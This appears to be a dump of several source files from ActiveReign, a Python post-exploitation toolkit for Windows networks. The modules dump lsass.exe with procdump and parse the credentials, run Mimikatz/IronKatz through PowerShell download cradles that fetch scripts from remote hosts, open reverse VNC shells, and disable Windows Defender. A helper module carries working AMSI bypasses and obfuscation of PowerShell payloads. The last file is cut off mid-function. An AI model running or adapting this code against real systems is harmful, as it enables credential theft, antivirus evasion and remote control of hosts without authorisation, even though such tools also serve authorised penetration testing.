setattr(args, 'timeout', timeout + 30)
else:
script_location = 'https://raw.githubusercontent.com/EmpireProject/Empire/master/data/module_source/management/Invoke-Vnc.ps1'
setattr(args, 'timeout', timeout + 15)
logger.debug('Script source: {}'.format(script_location))
# Setup PS1 Script
if self.args['CONTYPE']['Value'] == 'reverse':
if not self.args['IPADDRESS']['Value']:
self.args['IPADDRESS']['Value'] = get_local_ip()
cmd = """Invoke-Vnc -ConType reverse -IpAddress {} -Port {} -Password {}""".format(self.args['IPADDRESS']['Value'],self.args['PORT']['Value'],self.args['PASSWORD']['Value'])
elif self.args['CONTYPE']['Value'] == 'bind':
cmd = """Invoke-Vnc -ConType bind -Port {} -Password {}""".format(self.args['PORT']['Value'],self.args['PASSWORD']['Value'])
else:
loggers['console'].success([smb_con.host, smb_con.ip, self.name.upper(), "Invalid CONTYPE"])
exit(1)
launcher = powershell.gen_ps_iex_cradle(script_location, cmd)
# Execute
cmd = powershell.create_ps_command(launcher, loggers['console'], force_ps32=args.force_ps32, no_obfs=args.no_obfs, server_os=smb_con.os)
x = code_execution(smb_con, args, target, loggers, config_obj, cmd, return_data=True)
# Display Output
if not x.startswith('Code execution failed'):
for line in x.splitlines():
loggers['console'].info([smb_con.host, smb_con.ip, self.name.upper(), line])
else:
loggers['console'].info([smb_con.host, smb_con.ip, self.name.upper(), "Command execute with no output"])
except Exception as e:
logger.debug("{} Error: {}".format(self.name, str(e))) | ActiveReign | /ActiveReign-1.0.5.tar.gz/ActiveReign-1.0.5/ar3/modules/invoke_vnc.py | invoke_vnc.py |
import re
import os
import io
from time import sleep
from argparse import Namespace
from pypykatz.pypykatz import pypykatz
from contextlib import redirect_stdout
from pypykatz.lsadecryptor.cmdhelper import LSACMDHelper
from ar3.logger import setup_log_file
from ar3.ops.enum.host_enum import code_execution
from ar3.helpers.misc import get_filestamp, gen_random_string, get_local_ip
class ProcDump():
def __init__(self):
self.name = 'procdump'
self.description = 'Uploads procdump.exe to system, captures lsass.exe, downloads & reads output locally using pypykatz'
self.author = ['@m8r0wn']
self.requires_admin = True
self.exec_methods = ['wmiexec', 'smbexec']
self.args = {}
def run(self, target, args, smb_con, loggers, config_obj):
# Setup vars
self.logger = loggers['console']
self.loggers = loggers
self.config_obj = config_obj
self.pd_binary = os.path.join(os.path.expanduser('~'), '.ar3', 'scripts', 'procdump.exe')
self.smb_con = smb_con
self.cmd_args = args
# Ability to change where tmp files located using cmd args
self.ip = '127.0.0.1'
self.share = args.exec_share
self.path = args.exec_path
# Remote file paths
self.binary_name = gen_random_string() + ".txt"
self.output_name = gen_random_string() + ".dmp"
# Local file paths
self.local_binary = os.path.join(os.path.expanduser('~'), '.ar3', 'scripts', 'procdump.exe')
self.file_name = 'procdump_{}_{}.dmp'.format(target, get_filestamp())
self.local_output = setup_log_file(args.workspace, self.file_name, ext='')
try:
self.procdump()
except Exception as e:
self.logger.fail([smb_con.host, smb_con.ip, self.name.upper(), e])
return
finally:
try:
self.logger.info([self.smb_con.host, self.smb_con.ip, self.name.upper(), "Deleting remote files"])
self.smb_con.deleteFile(self.path + self.binary_name, self.share)
self.smb_con.deleteFile(self.path + self.output_name, self.share)
except:
pass
# Check for local dmp file, & parse
if os.path.exists(self.local_output):
if os.path.getsize(self.local_output) != 0:
try:
self.logger.info([smb_con.host, smb_con.ip, self.name.upper(), "Parsing dump file: {}".format(self.file_name)])
self.parsedump(loggers, smb_con, self.local_output)
except:
self.logger.fail([smb_con.host, smb_con.ip, self.name.upper(), "Error reading dump file: {}".format(self.file_name)])
else:
self.logger.fail([smb_con.host, smb_con.ip, self.name.upper(), "No data found, removing empty dmp file"])
os.remove(self.local_output)
else:
self.logger.fail([smb_con.host, smb_con.ip, self.name.upper(), "Dmp file not found"])
##########################
# Procdump logic
##########################
def procdump(self):
# Check local binary exists for upload:
if not os.path.exists(self.local_binary):
raise Exception("Local procdump executable not found, run \"ar3 enum --reload\"")
# Upload procdump (if applicable)
if self.upload_procdump():
self.logger.info([self.smb_con.host, self.smb_con.ip, self.name.upper(),
"Uploaded procdump.exe to \\\\{}\\{}{}".format(self.ip, self.share, self.path + self.output_name)])
if not self.verify_remoteFile(self.binary_name):
raise Exception("Unable to verify procdump.exe in remote path, check system's AV settings")
sleep(2)
# Execute
try:
setattr(self.cmd_args, 'timeout', self.cmd_args.timeout + 25)
exec_path = "\\\\{}\\{}{}".format(self.ip, self.share, self.path + self.binary_name)
remote_output = "\\\\{}\\{}{}".format(self.ip, self.share, self.path + self.output_name)
cmd = '{} -accepteula -ma lsass.exe {}'.format(exec_path, remote_output)
self.logger.info([self.smb_con.host, self.smb_con.ip, self.name.upper(), "Executing remote dump of lsass.exe"])
results = code_execution(self.smb_con, self.cmd_args, self.smb_con.ip, self.loggers, self.config_obj, cmd, return_data=True)
for x in results.splitlines():
if x:
self.logger.info([self.smb_con.host, self.smb_con.ip, self.name.upper(), x])
except Exception as e:
raise Exception("Procdump execution error: {}".format(str(e)))
sleep(2)
# Download output
if self.verify_remoteFile(self.output_name):
self.logger.info([self.smb_con.host, self.smb_con.ip, self.name.upper(), "Downloading remote output..."])
self.smb_con.downloadFile(self.path+self.output_name, self.local_output, self.share)
else:
raise Exception("Unable to verify dmp in remote path, check system's AV settings")
sleep(2)
def upload_procdump(self,):
try:
self.smb_con.uploadFile(self.local_binary, self.path+self.binary_name, self.share)
return True
except Exception as e:
raise Exception('Unable to upload procdump.exe: {}'.format(str(e)))
def verify_remoteFile(self, filename):
found = False
for x in self.smb_con.list_path(self.share, self.path + "*"):
try:
dir_file = x.get_longname().decode('UTF-8')
except:
dir_file = x.get_longname()
if dir_file.lower() == filename.lower():
return True
return found
##########################
# pypykatz dump parser
##########################
def parsedump(self, loggers, smb_con, dumpfile):
# Modified from:
# https://github.com/awsmhacks/CrackMapExtreme/blob/a3a0ca13014b88dd2feb6db2ac522e2573321d6c/cmx/protocols/smb.py
# & Inspiration by @HackAndDo aka Pixis for these parse bits
arg = Namespace(outfile = False,
json = False,
grep = False,
kerberos_dir = False,
recursive = False,
directory = False)
out = pypykatz.parse_minidump_file(dumpfile)
f = io.StringIO()
with redirect_stdout(f): # Hides output
LSACMDHelper().process_results({"dumpfile": out}, [], arg)
logger = loggers['console']
db_updates = 0
for cred in self.parse_output(f.getvalue()):
if cred['Password']:
smb_con.db.update_user(cred['Username'], cred['Password'], cred['Domain'], '')
logger.success([smb_con.host, smb_con.ip, self.name.upper(), "{}\\{}:{}".format(cred['Domain'], cred['Username'], cred['Password'])])
db_updates += 1
elif cred['Hash']:
smb_con.db.update_user(cred['Username'], '', cred['Domain'], cred['Hash'])
logger.success([smb_con.host, smb_con.ip, self.name.upper(), "{}\\{}:{}".format(cred['Domain'], cred['Username'], cred['Hash'])])
db_updates += 1
logger.info([smb_con.host, smb_con.ip, self.name.upper(), "{} credentials updated in database".format(db_updates)])
logger.info([smb_con.host, smb_con.ip, self.name.upper(), "Dmp file saved to: {}".format(self.local_output)])
def parse_output(self, output):
regex = r"(?:username:? (?!NA)(?P<username>.+)\n.*domain(?:name)?:? (?P<domain>.+)\n)(?:.*password:? (?!None)(?P<password>.+)|.*\n.*NT: (?P<hash>.*))"
matches = re.finditer(regex, output, re.MULTILINE | re.IGNORECASE)
credentials = []
for match in matches:
domain = match.group("domain")
username = match.group("username")
password = match.group("password")
hashes = match.group("hash")
if password and len(password) < 128 or hashes and len(hashes) < 128: # Ignore kerberose
credentials.append({'Domain' : domain,
'Username' : username,
'Password' : password,
'Hash' : hashes})
return credentials | ActiveReign | /ActiveReign-1.0.5.tar.gz/ActiveReign-1.0.5/ar3/modules/procdump.py | procdump.py |
from time import sleep
from ar3.ops.enum.host_enum import code_execution
from ar3.helpers import powershell
class KillDefender():
def __init__(self):
self.name = 'Kill Defender'
self.description = 'Kill Windows Defender Real Time Monitoring'
self.author = ['@m8r0wn']
self.credit = ['@awsmhacks']
self.requires_admin = True
self.exec_methods = ['wmiexec', 'smbexec', 'atexec']
self.args = {
'ACTION': {
'Description': 'disable: turn-off Defender | enable: re-enable defender',
'Required': False,
'Value': 'disable'
}
}
def run(self, target, args, smb_con, loggers, config_obj):
'''
Full credit for kill-defender goes to @awsmhacks, amazing work!
This was implemented in his project over at: https://github.com/awsmhacks/CrackMapExtreme
Additional Resources:
https://www.tenforums.com/tutorials/105486-enable-disable-notifications-windows-security-windows-10-a.html
'''
logger = loggers['console']
logger.warning([smb_con.host, smb_con.ip, self.name.upper(), "This module is still in testing and not opsec safe..."])
if self.args['ACTION']['Value'].lower() == 'disable':
notify = "Enabled"
action = "$true"
elif self.args['ACTION']['Value'].lower() == 'enable':
notify = "Disabled"
action = "$false"
else:
loggers['console'].fail([smb_con.host, smb_con.ip, self.name.upper(), "Invalid module arg, only {enable, disable} allowed"])
return
kill_notify = """"FOR /F %a IN ('REG.EXE QUERY hku 2^>NUL ^| FIND ^"HKEY_USERS^"') DO REG.EXE add ^"%a\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Notifications\\Settings\\Windows.SystemToast.SecurityAndMaintenance^" /v ^"{}^" /d ^"0^" /t REG_DWORD /F" """.format(notify)
kill_defender = 'Set-MpPreference -DisableRealtimeMonitoring {};'.format(action)
kd_verify = 'Get-MpPreference |select DisableRealtimeMonitoring'
try:
# Modify notifications
x = code_execution(smb_con, args, target, loggers, config_obj, kill_notify, return_data=True)
# Modify Defender
cmd = powershell.create_ps_command(kill_defender, loggers['console'], force_ps32=args.force_ps32, no_obfs=args.no_obfs, server_os=smb_con.os)
x = code_execution(smb_con, args, target, loggers, config_obj, cmd, return_data=True)
loggers['console'].info([smb_con.host, smb_con.ip, self.name.upper(), 'Execution complete, Sleeping 5 seconds for process shutdown...'])
sleep(8)
# Verify
loggers['console'].info([smb_con.host, smb_con.ip, self.name.upper(), 'Verifying Defender status...'])
cmd = powershell.create_ps_command(kd_verify, loggers['console'], force_ps32=args.force_ps32,no_obfs=args.no_obfs, server_os=smb_con.os)
x = code_execution(smb_con, args, target, loggers, config_obj, cmd, return_data=True)
for line in x.splitlines():
loggers['console'].info([smb_con.host, smb_con.ip, self.name.upper(), line])
except Exception as e:
logger.debug("{} Error: {}".format(self.name, str(e))) | ActiveReign | /ActiveReign-1.0.5.tar.gz/ActiveReign-1.0.5/ar3/modules/kill_defender.py | kill_defender.py |
import re
from ar3.helpers import powershell
from ar3.logger import setup_file_logger
from ar3.helpers.misc import validate_ntlm
from ar3.ops.enum.host_enum import code_execution
from ar3.helpers.misc import get_local_ip, get_filestamp
class IronKatz():
def __init__(self):
self.name = 'Ironkatz'
self.description = 'Execute SafetyKatz using an embedded Iron Python Engine'
self.author = ['@m8r0wn']
self.credit = ['@byt3bl33d3r', '@harmj0y']
self.requires_admin = True
self.exec_methods = ['wmiexec', 'smbexec']
self.args = {}
def run(self, target, args, smb_con, loggers, config_obj):
logger = loggers['console']
timeout = args.timeout
loggers['console'].info([smb_con.host, smb_con.ip, self.name.upper(), 'Attempting Invoke-Ironkatz'])
try:
# Define Script Source
if args.fileless:
srv_addr = get_local_ip()
script_location = 'http://{}/Invoke-Ironkatz.ps1'.format(srv_addr)
setattr(args, 'timeout', timeout + 60)
else:
script_location = 'https://raw.githubusercontent.com/m8r0wn/OffensiveDLR/master/Invoke-IronKatz.ps1'
setattr(args, 'timeout', timeout + 25)
logger.debug('Script source: {}'.format(script_location))
# Setup PS1 Script
launcher = powershell.gen_ps_iex_cradle(script_location, '')
try:
# Execute
cmd = powershell.create_ps_command(launcher, loggers['console'], force_ps32=args.force_ps32, no_obfs=args.no_obfs, server_os=smb_con.os)
results = code_execution(smb_con, args, target, loggers, config_obj, cmd, return_data=True)
# Display Output
if not results:
loggers['console'].fail([smb_con.host, smb_con.ip, self.name.upper(), 'No output returned'])
return
elif args.debug:
for line in results.splitlines():
loggers['console'].debug([smb_con.host, smb_con.ip, self.name.upper(), line])
# Parse results and send creds to db
db_updates = 0
for cred in self.parse_mimikatz(results):
if cred[0] == "hash":
smb_con.db.update_user(cred[2], '', cred[1], cred[3])
loggers['console'].success([smb_con.host, smb_con.ip, self.name.upper(),"{}\\{}:{}".format(cred[1], cred[2], cred[3])])
db_updates += 1
elif cred[0] == "plaintext":
smb_con.db.update_user(cred[2], cred[3], cred[1], '')
loggers['console'].success([smb_con.host, smb_con.ip, self.name.upper(),"{}\\{}:{}".format(cred[1], cred[2], cred[3])])
db_updates += 1
loggers['console'].success([smb_con.host, smb_con.ip, self.name.upper(), "{} credentials updated in database".format(db_updates)])
# write results to file
file_name = 'ironkatz_{}_{}.txt'.format(target, get_filestamp())
tmp_logger = setup_file_logger(args.workspace, file_name, ext='')
tmp_logger.info(results)
loggers['console'].info([smb_con.host, smb_con.ip, self.name.upper(), "Output saved to: {}".format(file_name)])
except Exception as e:
if str(e) == "list index out of range":
loggers['console'].fail([smb_con.host, smb_con.ip, self.name.upper(), "{} failed".format(self.name)])
else:
loggers['console'].fail([smb_con.host, smb_con.ip, self.name.upper(), str(e)])
except Exception as e:
logger.debug("{} Error: {}".format(self.name, str(e)))
def uniquify_tuples(self, tuples):
"""
uniquify mimikatz tuples based on the password
cred format- (credType, domain, username, password, hostname, sid)
Stolen from the Empire project.
"""
seen = set()
return [item for item in tuples if
"{}{}{}{}".format(item[0], item[1], item[2], item[3]) not in seen and not seen.add(
"{}{}{}{}".format(item[0], item[1], item[2], item[3]))]
def parse_mimikatz(self, data):
"""
Parse the output from Invoke-Mimikatz to return credential sets.
This was directly stolen from the Empire project as well.
"""
# cred format:
# credType, domain, username, password, hostname, sid
creds = []
# regexes for "sekurlsa::logonpasswords" Mimikatz output
regexes = ["(?s)(?<=msv :).*?(?=tspkg :)", "(?s)(?<=tspkg :).*?(?=wdigest :)",
"(?s)(?<=wdigest :).*?(?=kerberos :)", "(?s)(?<=kerberos :).*?(?=ssp :)",
"(?s)(?<=ssp :).*?(?=credman :)", "(?s)(?<=credman :).*?(?=Authentication Id :)",
"(?s)(?<=credman :).*?(?=mimikatz)"]
hostDomain = ""
domainSid = ""
hostName = ""
lines = data.split("\n")
for line in lines[0:2]:
if line.startswith("Hostname:"):
try:
domain = line.split(":")[1].strip()
temp = domain.split("/")[0].strip()
domainSid = domain.split("/")[1].strip()
hostName = temp.split(".")[0]
hostDomain = ".".join(temp.split(".")[1:])
except:
pass
for regex in regexes:
p = re.compile(regex)
for match in p.findall(data):
lines2 = match.split("\n")
username, domain, password = "", "", ""
for line in lines2:
try:
if "Username" in line:
username = line.split(":", 1)[1].strip()
elif "Domain" in line:
domain = line.split(":", 1)[1].strip()
elif "NTLM" in line or "Password" in line:
password = line.split(":", 1)[1].strip()
except:
pass
if username != "" and password != "" and password != "(null)":
sid = ""
# substitute the FQDN in if it matches
if hostDomain.startswith(domain.lower()):
domain = hostDomain
sid = domainSid
if validate_ntlm(password):
credType = "hash"
else:
credType = "plaintext"
# ignore machine account plaintexts
if not (credType == "plaintext" and username.endswith("$")):
creds.append((credType, domain, username, password, hostName, sid))
if len(creds) == 0:
# check if we have lsadump output to check for krbtgt
# happens on domain controller hashdumps
for x in range(8, 13):
if lines[x].startswith("Domain :"):
domain, sid, krbtgtHash = "", "", ""
try:
domainParts = lines[x].split(":")[1]
domain = domainParts.split("/")[0].strip()
sid = domainParts.split("/")[1].strip()
# substitute the FQDN in if it matches
if hostDomain.startswith(domain.lower()):
domain = hostDomain
sid = domainSid
for x in range(0, len(lines)):
if lines[x].startswith("User : krbtgt"):
krbtgtHash = lines[x + 2].split(":")[1].strip()
break
if krbtgtHash != "":
creds.append(("hash", domain, "krbtgt", krbtgtHash, hostName, sid))
except Exception as e:
pass
if len(creds) == 0:
# check if we get lsadump::dcsync output
if '** SAM ACCOUNT **' in lines:
domain, user, userHash, dcName, sid = "", "", "", "", ""
for line in lines:
try:
if line.strip().endswith("will be the domain"):
domain = line.split("'")[1]
elif line.strip().endswith("will be the DC server"):
dcName = line.split("'")[1].split(".")[0]
elif line.strip().startswith("SAM Username"):
user = line.split(":")[1].strip()
elif line.strip().startswith("Object Security ID"):
parts = line.split(":")[1].strip().split("-")
sid = "-".join(parts[0:-1])
elif line.strip().startswith("Hash NTLM:"):
userHash = line.split(":")[1].strip()
except:
pass
if domain != "" and userHash != "":
creds.append(("hash", domain, user, userHash, dcName, sid))
return self.uniquify_tuples(creds) | ActiveReign | /ActiveReign-1.0.5.tar.gz/ActiveReign-1.0.5/ar3/modules/ironkatz.py | ironkatz.py |
import os
import importlib
from requests import get
import ar3
"""
A bit confusing how we set it up here but this will ensure
"""
MODULES = {
# 'Module Name/filename' : {'Class Name', 'Source URL'}
'example_module' : {'Class' : 'ExampleModule'},
'test_execution' : {'Class' : 'TestExecution'},
'process_hunter' : {'Class' : 'ProcessHunter'},
'invert_hunter' : {'Class' : 'InvertHunter'},
'user_hunter' : {'Class' : 'UserHunter'},
'get_netdomaincontroller' : {'Class' : 'GetNetDomainController'},
'get_lockedaccounts' : {'Class' : 'GetLockedAccounts'},
'wifi_passwords' : {'Class' : 'WifiPasswords'},
'gpp_password' : {'Class' : 'GPP_Password'},
'kill_defender' : {'Class' : 'KillDefender'},
'wdigest' : {'Class' : 'Wdigest'},
'mimikatz' : {'Class' : 'InvokeMimikatz',
'File' : 'Invoke-Mimikatz.ps1',
'URL' : 'https://raw.githubusercontent.com/EmpireProject/Empire/master/data/module_source/credentials/Invoke-Mimikatz.ps1'},
'ironkatz' : {'Class' : 'IronKatz',
'File' : 'Invoke-Ironkatz.ps1',
'URL' : 'https://raw.githubusercontent.com/m8r0wn/OffensiveDLR/master/Invoke-IronKatz.ps1'},
'invoke_kerberoast' : {'Class' : 'InvokeKerberoast',
'File' : 'Invoke-Kerberoast.ps1',
'URL' : 'https://raw.githubusercontent.com/EmpireProject/Empire/master/data/module_source/credentials/Invoke-Kerberoast.ps1'},
'invoke_vnc' : {'Class' : 'InvokeVNC',
'File' : 'Invoke-Vnc.ps1',
'URL' : 'https://raw.githubusercontent.com/EmpireProject/Empire/master/data/module_source/management/Invoke-Vnc.ps1'},
'procdump' : {'Class' : 'ProcDump',
'File' : 'procdump.exe',
'URL' : 'https://live.sysinternals.com/procdump.exe'},
}
def list_modules():
print(ar3.banner())
print(" Active Modules")
print(" \033[1;30m>>-------------------->\033[1;m")
for mod in MODULES.keys():
module_class = get_module_class(mod)
class_obj = module_class()
print('{:<6} {:<25} {}'.format(' ', mod, class_obj.description))
for x in class_obj.args.keys():
print('\033[1;30m{:32} |_{}= {} (Required: {})\033[1;m'.format(' ',x, class_obj.args[x]['Description'], class_obj.args[x]['Required']))
def populate_mod_args(class_obj, module_args, logger):
# -o 'SERVER=192.168.1.1,PROCESS=cmd.exe'
arg_split = module_args.strip().split(',')
# Populate module args
for x in arg_split:
if x:
try:
arg, value = x.split("=")
class_obj.args[arg.upper()]['Value'] = value
except:
logger.fail("Unable to process arg: \"{}\"".format(x))
exit(1)
# Check for required arg
for arg, data in class_obj.args.items():
if data['Required'] and not data['Value']:
logger.warning("{}: Missing required argument \"{}\"".format(class_obj.name, arg))
exit(1)
def get_module_class(name):
if name not in MODULES:
raise Exception('Can not find module: {}'.format(name))
cname = MODULES[name]['Class']
modname = '.'.join([__name__, name])
module = importlib.import_module(modname)
return getattr(module, cname)
def get_module_resources():
"""
Called by first_run to download script resources
"""
for module, data in MODULES.items():
if 'URL' in data.keys() :
src = os.path.join(os.path.expanduser('~'), '.ar3', 'scripts', data['File'])
if os.path.exists(src):
os.remove(src)
download_file(data['URL'], src)
def download_file(source, output):
f = open(output, 'wb+')
f.write(get(source, verify=False, timeout=5).content)
f.close() | ActiveReign | /ActiveReign-1.0.5.tar.gz/ActiveReign-1.0.5/ar3/modules/__init__.py | __init__.py |
from ar3.core.ldap import LdapCon
class GetLockedAccounts():
def __init__(self):
self.name = 'lockedaccounts'
self.description = 'List active domain accounts that are locked or within 1 away from the threshold'
self.author = ['@m8r0wn']
self.requires_admin = False
self.args = {
'THRESHOLD': {
'Description': 'Lockout threshold if LDAP fails (Default: 3)',
'Required' : False,
'Value' : 3
},
'SERVER': {
'Description': 'Define LDAP Server',
'Required' : False,
'Value' : ''
}
}
def run(self, target, args, smb_con, loggers, config_obj):
logger = loggers['console']
users = {}
domain = {}
try:
# Create LDAP Con
x = LdapCon(args, loggers, args.ldap_srv, smb_con.db)
x.create_ldap_con()
if not x:
logger.fail([smb_con.host, smb_con.ip, self.name.upper(), 'Unable to create LDAP connection'])
return
logger.success([smb_con.host, smb_con.ip, self.name.upper(), 'Connection established (server: {}) (LDAPS: {})'.format(x.host, x.ldaps)])
# Get Domain Lockout Threshold
domain = x.domain_query(False)
try:
lockout_threshold = int(domain[list(domain.keys())[0]]['lockoutThreshold'])
logger.info([smb_con.host, smb_con.ip, self.name.upper(), "Domain Lockout Threshold Detected: {}".format(lockout_threshold), "Logon_Server: {}".format(x.host)])
except:
lockout_threshold = self.args['Lockout']['Value']
logger.info([smb_con.host, smb_con.ip, self.name.upper(), "Lockout threshold detection failed, using default: {}".format(lockout_threshold)])
#Collect users
users = x.user_query('active', False)
logger.debug("{}: Identified {} domain users".format(self.name, str(len(users.keys())),))
if users:
# Compare
for user, data in users.items():
try:
if int(data['badPwdCount']) >= lockout_threshold:
logger.success([smb_con.host, smb_con.ip, self.name.upper(), user,"BadPwd: \033[1;31m{:<5}\033[1;m".format(data['badPwdCount']),"Logon_Server: {}".format(x.host)])
elif int(data['badPwdCount']) >= (lockout_threshold-1):
logger.success([smb_con.host, smb_con.ip, self.name.upper(), user, "BadPwd: \033[1;33m{:<5}\033[1;m".format(data['badPwdCount']), "Logon_Server: {}".format(x.host)])
except:
pass
else:
logger.fail("{}: No users returned from query".format(self.name))
x.close()
except Exception as e:
logger.debug("{} Error: {}".format(self.name, str(e))) | ActiveReign | /ActiveReign-1.0.5.tar.gz/ActiveReign-1.0.5/ar3/modules/get_lockedaccounts.py | get_lockedaccounts.py |
import re
from base64 import b64encode
from string import ascii_lowercase
from random import choice, sample,choices
############################
# PS Code Execution on Host
############################
def create_ps_command(ps_command, logger, force_ps32=False, no_obfs=False, server_os='Windows'):
logger.debug('Generating PowerShell command')
amsi_bypass = create_amsi_bypass(server_os)
if force_ps32:
command = amsi_bypass + """
$functions = {{
function Command-ToExecute
{{
{command}
}}
}}
if ($Env:PROCESSOR_ARCHITECTURE -eq 'AMD64')
{{
$job = Start-Job -InitializationScript $functions -ScriptBlock {{Command-ToExecute}} -RunAs32
$job | Wait-Job
}}
else
{{
IEX "$functions"
Command-ToExecute
}}
""".format(command=amsi_bypass + ps_command)
else:
command = amsi_bypass + ps_command
if no_obfs:
command = 'powershell.exe -noni -nop -w 1 -enc {}'.format(encode_ps_command(command).decode("utf-8"))
else:
obfs_attempts = 0
while True:
command = 'powershell.exe -exec bypass -noni -nop -w 1 -C "{}"'.format(invoke_obfuscation(command))
if len(command) <= 8191:
break
if obfs_attempts == 4:
logger.fail('Command exceeds maximum length of 8191 chars (was {}). exiting.'.format(len(command)))
raise Exception('Command exceeds maximum length of 8191 chars (was {}). exiting.'.format(len(command)))
obfs_attempts += 1
if len(command) > 8191:
logger.fail('Command exceeds maximum length of 8191 chars (was {}). exiting.'.format(len(command)))
raise Exception('Command exceeds maximum length of 8191 chars (was {}). exiting.'.format(len(command)))
return command
def create_amsi_bypass(server_os):
# Stolen From: https://github.com/awsmhacks/CrackMapExtreme/blob/master/cmx/helpers/powershell.py
"""AMSI bypasses are an ever-changing p.i.t.a
The default bypass is from amonsec and released around july/2019
and works on server2016/win10 1804+
The default wont work on older window systems though, so we revert
back to ol' faithful if the os is win7 or 2012.
"""
# bypass from amonsec. tweaked and made reliable by the homie @nixbyte
# https://gist.githubusercontent.com/amonsec/986db36000d82b39c73218facc557628/raw/6b8587154ac478091388bc56d9a04283953800b8/AMSI-Bypass.ps1
if "2012" in server_os or "7601" in server_os:
amsi_bypass = """[Net.ServicePointManager]::ServerCertificateValidationCallback = {$true}
try{
[Ref].Assembly.GetType('Sys'+'tem.Man'+'agement.Aut'+'omation.Am'+'siUt'+'ils').GetField('am'+'siIni'+'tFailed', 'NonP'+'ublic,Sta'+'tic').SetValue($null, $true)
}catch{}"""
else:
amsi_bypass = """$kk='using System;using System.Runtime.InteropServices;public class kk {[DllImport("kernel32")] public static extern IntPtr GetProcAddress(IntPtr hModule,string lpProcName);[DllImport("kernel32")] public static extern IntPtr LoadLibrary(string lpLibFileName);[DllImport("kernel32")] public static extern bool VirtualProtect(IntPtr lpAddress,UIntPtr dwSize,uint flNewProtect,out uint lpflOldProtect);}';Add-Type $kk;$oldProtectionBuffer=0;[IntPtr]$address=[IntPtr]::Add([kk]::GetProcAddress([kk]::LoadLibrary("amsi.dll"),"DllCanUnloadNow"),2000);[kk]::VirtualProtect($address, [uint32]2, 4, [ref]$oldProtectionBuffer)|Out-Null;[System.Runtime.InteropServices.Marshal]::Copy([byte[]] (0x31,0xC0,0xC3),0,$address,3);[kk]::VirtualProtect($address,[uint32]2,$oldProtectionBuffer,[ref]$oldProtectionBuffer)|Out-Null;"""
return amsi_bypass
############################
# PS Obfuscation Techniques
############################
def encode_ps_command(command):
return b64encode(command.encode('UTF-16LE'))
def invoke_obfuscation(scriptString):
"""
Taken from the GreatSCT project
https://raw.githubusercontent.com/GreatSCT/GreatSCT/master/Tools/Bypass/bypass_common/invoke_obfuscation.py
"""
# Add letters a-z with random case to $RandomDelimiters.
alphabet = ''.join(choice([i.upper(), i]) for i in ascii_lowercase)
# Create list of random dxelimiters called randomDelimiters.
# Avoid using . * ' " [ ] ( ) etc. as delimiters as these will cause problems in the -Split command syntax.
randomDelimiters = ['_','-',',','{','}','~','!','@','%','&','<','>',';',':']
for i in alphabet:
randomDelimiters.append(i)
# Only use a subset of current delimiters to randomize what you see in every iteration of this script's output.
randomDelimiters = choices(randomDelimiters, k=int(len(randomDelimiters)/4))
# Convert $ScriptString to delimited ASCII values in [Char] array separated by random delimiter from defined list $RandomDelimiters.
delimitedEncodedArray = ''
for char in scriptString:
delimitedEncodedArray += str(ord(char)) + choice(randomDelimiters)
# Remove trailing delimiter from $DelimitedEncodedArray.
delimitedEncodedArray = delimitedEncodedArray[:-1]
# Create printable version of $RandomDelimiters in random order to be used by final command.
test = sample(randomDelimiters, len(randomDelimiters))
randomDelimitersToPrint = ''.join(i for i in test)
# Generate random case versions for necessary operations.
forEachObject = choice(['ForEach','ForEach-Object','%'])
strJoin = ''.join(choice([i.upper(), i.lower()]) for i in '[String]::Join')
strStr = ''.join(choice([i.upper(), i.lower()]) for i in '[String]')
join = ''.join(choice([i.upper(), i.lower()]) for i in '-Join')
charStr = ''.join(choice([i.upper(), i.lower()]) for i in 'Char')
integer = ''.join(choice([i.upper(), i.lower()]) for i in 'Int')
forEachObject = ''.join(choice([i.upper(), i.lower()]) for i in forEachObject)
# Create printable version of $RandomDelimiters in random order to be used by final command specifically for -Split syntax.
randomDelimitersToPrintForDashSplit = ''
for delim in randomDelimiters:
# Random case 'split' string.
split = ''.join(choice([i.upper(), i.lower()]) for i in 'Split')
randomDelimitersToPrintForDashSplit += '-' + split + choice(['', ' ']) + '\'' + delim + '\'' + choice(['', ' '])
randomDelimitersToPrintForDashSplit = randomDelimitersToPrintForDashSplit.strip('\t\n\r')
# Randomly select between various conversion syntax options.
randomConversionSyntax = []
randomConversionSyntax.append('[' + charStr + ']' + choice(['', ' ']) + '[' + integer + ']' + choice(['', ' ']) + '$_')
randomConversionSyntax.append('[' + integer + ']' + choice(['', ' ']) + '$_' + choice(['', ' ']) + choice(['-as', '-As', '-aS', '-AS']) + choice(['', ' ']) + '[' + charStr + ']')
randomConversionSyntax = choice(randomConversionSyntax)
# Create array syntax for encoded scriptString as alternative to .Split/-Split syntax.
encodedArray = ''
for char in scriptString:
encodedArray += str(ord(char)) + choice(['', ' ']) + ',' + choice(['', ' '])
# Remove trailing comma from encodedArray
encodedArray = '(' + choice(['', ' ']) + encodedArray.rstrip().rstrip(',') + ')'
# Generate random syntax to create/set OFS variable ($OFS is the Output Field Separator automatic variable).
# Using Set-Item and Set-Variable/SV/SET syntax. Not using New-Item in case OFS variable already exists.
# If the OFS variable did exists then we could use even more syntax: $varname, Set-Variable/SV, Set-Item/SET, Get-Variable/GV/Variable, Get-ChildItem/GCI/ChildItem/Dir/Ls
# For more info: https://msdn.microsoft.com/en-us/powershell/reference/5.1/microsoft.powershell.core/about/about_automatic_variables
setOfsVarSyntax = []
setOfsVarSyntax.append('Set-Item' + choice([' '*1, ' '*2]) + "'Variable:OFS'" + choice([' '*1, ' '*2]) + "''")
setOfsVarSyntax.append(choice(['Set-Variable', 'SV', 'SET']) + choice([' '*1, ' '*2]) + "'OFS'" + choice([' '*1, ' '*2]) + "''")
setOfsVar = choice(setOfsVarSyntax)
setOfsVarBackSyntax = []
setOfsVarBackSyntax.append('Set-Item' + choice([' '*1, ' '*2]) + "'Variable:OFS'" + choice([' '*1, ' '*2]) + "' '")
setOfsVarBackSyntax.append('Set-Item' + choice([' '*1, ' '*2]) + "'Variable:OFS'" + choice([' '*1, ' '*2]) + "' '")
setOfsVarBack = choice(setOfsVarBackSyntax)
# Randomize case of $SetOfsVar and $SetOfsVarBack.
setOfsVar = ''.join(choice([i.upper(), i.lower()]) for i in setOfsVar)
setOfsVarBack = ''.join(choice([i.upper(), i.lower()]) for i in setOfsVarBack)
# Generate the code that will decrypt and execute the payload and randomly select one.
baseScriptArray = []
baseScriptArray.append('[' + charStr + '[]' + ']' + choice(['', ' ']) + encodedArray)
